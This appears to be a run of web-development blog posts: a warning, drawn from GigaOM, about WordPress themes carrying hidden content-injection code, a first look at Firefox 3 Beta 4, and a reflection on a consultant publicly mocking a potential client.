web development

Via GigaOM:

Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted....

...There are lots of reasons a hacker may want to inject code into a page:

• To infect visitors by exploiting a browser vulnerability
• To place ads they can then get revenue from
• To embed links to blogs they own, improving their page rank
• To entice people to click on links that lead them elsewhere

The clever thing about the WordPress hack was that it would check for code to insert into a page each time it was loaded, but if none was available, it would just sit there quietly.

It's all too easy to compromise a website's security via the theming layer. Malice is just one possibility. There are also hacks and vulnerable code gimmicks pursued amateur theme developers who just don't know better. It's not just a Wordpress thing -- it's all websites, whether built on open source or proprietary platforms (though not static html sites, which presumably are as safe as their servers).

In this context, the question for the website owner is whether you want to buy a theme (or download a free one) from an un-vetted vendor. Sure, if you are an adept coder, and/or know the proper API calls to protect your site from things like XSS, you can just clean that up and enjoy the design that attracted you in the first place. But if you don't know those vulnerabilities, you could be opening your site up to ill-will or novice mistakes. Caveat emptor. Don't end up like Deep Jive. Ouch.

Today I downloaded and installed Firefox 3 Beta 4. I could not do it before, but now that the Web Developer tools are updated and Firebug has a 1.1 beta that works in FF3, that's enough for me.

I don't know about you, but on both Macs I use regularly, Firefox 2 was crashing all the time. Last night, while writing a blog post for BlogHer, my browser crashed at least a dozen times. On my Mac Pro, Firefox completely melted down -- twice -- requiring complete rebuild from the start, manually adding one plug-in at a time. But I had to stick it out because I need those developer tools. I cannot imagine working without Firebug.

The new UI is clean, and seems to take up a bit less space. And so far FF3 is fast. Me likes.

While I was laying in bed last night, I found myself questioning my post yesterday and the attitudes reflected in Joe the Peacock's mocking of what appears to be a rather clueless potential client.

He seems to have struck a nerve, judging by Joe's forums:

Yes let us hear the douchebag please!

I think Joe's got to have at least a little bit of masochist in him to be a consultant, especially an Internet consultant. Sir Geek and I did it for several years and listening to the clients blather on about what they think they want/need is enough to make your brain explode.

Freaking hysterical.

Okay, at first reading of Joe's rant, I confess I did laugh a little. It certainly was outrageous enough to inspire me to post a link.

But to publicly share such mean-spirited attitudes towards potential clients strikes me as rather sad, and what I would consider unprofessional. Now maybe the person on the other end of the line was a jerk. I certainly have encountered my share of jerks.

But Joe mocks this "potential client" for his (?) ignorance.

We in web and software development live in a world that is scarcely understood by most of the people who use what we produce. That's all the more true in the corner of that world where I spend my time: open source, which is a community-of-a-commons concept that seems to elude even the majority of folks in Silicon Valley (who are much more attached to that other source, "outsource"). Quite often we are in the business of educating and enlightening the client, sometimes seemingly as much as we are developing for the client. It comes with the territory. After all, clients come to us, in large part, because we are knowledgeable in things which they are not.

Hello?

Jerks have what's coming to them, imho. But calling someone a "dipshit" for simple ignorance? That's ignorance.

I suppose it's natural that such cynical attitudes will bleed into all areas of business, even this "new economy" we're all a part of that's supposed to, you know, change (read: "improve") the way business is conducted in the world. People are people, and cynical contempt is all-too-common a human attitude. Just don't count me among its willing practitioners.

Then again, Joe is a writer so maybe it's all just fiction. If so, never mind. I'll just walk slowly away from the computer and sit down for another viewing of Office Space.

An unordered list of thoughts I had during a conference call with a potential client today. Dear dear!

[Update: I posted some more thoughts here.]